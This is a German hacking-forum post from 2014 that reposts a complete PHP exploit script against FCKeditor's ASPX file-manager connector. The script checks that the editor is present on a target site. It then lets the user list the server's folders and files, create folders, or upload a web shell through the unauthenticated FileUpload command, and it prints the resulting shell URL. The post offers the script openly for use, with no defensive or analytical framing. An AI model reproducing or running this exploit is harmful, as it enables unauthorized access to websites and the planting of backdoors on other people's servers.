Anmelden
Benutzerkonto erstellen
<?php
/** To prevent of time out **/
set_time_limit(0);
/** Error reporting **/
//error_reporting(0);
/** Necessary variables **/
$site = $argv[1];
/** Curl function with appropriate adjustments **/
function CurlPost($url='localhost',$data=array())
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_TIMEOUT,50);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
return curl_exec($ch);
curl_close($ch);
}
function AppropriateName($FileName)
{
return str_replace('"','',str_replace('<File name="','',str_replace('<Folder name="','',$FileName)));
}
/** Initializing **/
echo ' ______
.-" "-.
/ \
| |
|, .-. .-. ,|
| )(__/ \__)( |
|/ /\ \|
(@_ (_ <img src='http://www.toolbase.bz/board/public/style_emoticons/<#EMO_DIR#>/_0021_^^.png' class='bbc_emoticon' alt='^^' /> _)
_ ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
)_/ \ /
(@ `--------`',"\n\n";
echo '/--------------------------------------------------------------\\',"\n";
echo '| Exploit by Yashar shahinzadeh & Mormoroth ',"\n";
echo '| Credit goes for http://ha.cker.ir & http://y-shahinzadeh.ir ',"\n";
echo '\--------------------------------------------------------------/',"\n\n";
/** Some information to user **/
echo '['.date("H:i:s").'] Site: ',$site,"\n";
echo '['.date("H:i:s").'] Checking whether if the fckeditor exists or not...',"\n";
/** Sending a HTTP request to fckeditr/ **/
$CheckFCK = get_headers($site.'fckeditor/');
/** Checking whether if the fckeditor exists or not **/
if(strstr($CheckFCK[0],'404')!==FALSE)
{
echo '['.date("H:i:s").'] fckeditor/ path not found',"\n";
exit();
}
/** FCKeditor path found **/
echo '['.date("H:i:s").'] The path seems to be existed...',"\n";
/** Options of choices **/
echo '['.date("H:i:s").'] What do you want to do? [(1)Getting folders and files,(2)Upload a file,(3)Create a folder] ';
$method = fopen('php://stdin','r');
$method = trim(fgets($method));
switch($method)
{
case '1':
echo '['.date("H:i:s").'] Please enter a path? ';
$path = fopen('php://stdin','r');
$path = trim(fgets($path));
/** URL to get files and folders **/
$GetFilesAndFoltersURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder='.$path;
echo '['.date("H:i:s").'] Gathreing...',"\n";
/** Gathring names **/
$content = file_get_contents($GetFilesAndFoltersURL);
/** File(s) **/
preg_match_all("/(<File name=\").*?(\")/is",$content,$files);
/** Folder(s) **/
preg_match_all("/(<Folder name=\").*?(\")/is",$content,$folders);
echo '['.date("H:i:s").'] Found ',count($folders[0]),' folder(s) and ',count($files[0])," file(s)\n\n";
sleep(1);
echo '/--------------------------------------------------------------\\',"\n";
/** Printing folder(s) **/
foreach($folders[0] as $FileName)
{
echo '| [Folder] '. AppropriateName($FileName),"\n";
}
/** Printing file(s) **/
foreach($files[0] as $FileName)
{
echo '| [File] '. AppropriateName($FileName),"\n";
}
echo '\--------------------------------------------------------------/',"\n\n";
break;
case '2':
/** Gathering shell name located in same directory **/
echo '['.date("H:i:s").'] Please provide a shell name: ';
$ShellName = fopen('php://stdin','r');
$ShellName = trim(fgets($ShellName));
/** Path **/
echo '['.date("H:i:s").'] Please enter a path? ';
$path = fopen('php://stdin','r');
$path = trim(fgets($path));
/** Checking if the local shell exists or not **/
if(file_exists($ShellName)===FALSE)
{
echo '['.date("H:i:s").'] File does not exist in current directory!',"\n";
exit();
}else echo '['.date("H:i:s").'] Shell loaded...',"\n";
/** Upload data **/
$data['NewFile'] = '@'.$ShellName;
/** Upload URL **/
$UploadURL = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder='.$path;
echo '['.date("H:i:s").'] Uploading shell...',"\n";
/** Uploading shell **/
CurlPost($UploadURL,$data);
/** Priting shell **/
$PureSit = explode('/',$site);
echo '['.date("H:i:s").'] SHELL: http://',$PureSit[2],'/uploadFiles/File/',$path,$ShellName,"\n";
break;
case '3':
echo '['.date("H:i:s").'] Please enter a path? ';
$path = fopen('php://stdin','r');
$path = trim(fgets($path));
echo '['.date("H:i:s").'] Provide folder name: ';
$name = fopen('php://stdin','r');
$name = trim(fgets($name));
/** URL to get files and folders **/
$CreateFolder = $site.'fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder='.$path.'&NewFolderName='.$name;
echo '['.date("H:i:s").'] Creating...',"\n";
/** Gathring names **/
$content = file_get_contents($CreateFolder);
echo '['.date("H:i:s").'] Folder was created successfully.',"\n";
sleep(1);
break;
}
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
[Exploit] FCK editor
Erstellt von
Dr. Spic
, 10.01.2014 22:28
#1
Geschrieben 10 January 2014 - 22:28 Uhr
Dr. Spic
-
- Members
-
- 0 Beiträge
- 223 Bedankt
31er
Likes
4
- Ch!ller gefällt das
Nach oben
Melden
Classic Hacking
| Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
|---|---|---|---|---|---|
OttosEditor v3.0.4 |
 Leaks
|
annaa |
|
|
|
AUTO SHELLS EXPLOIT - AUTO UPLAOD [SHELLS & FILES] |
Leaks
|
annaa |
|
|
|
SMTP-EX - SMTP Exploit |
Leaks
|
annaa |
|
|
Dieses Thema wurde von 9 Mitglied(ern) gelesen
Hacking & Security
Made with in germany.
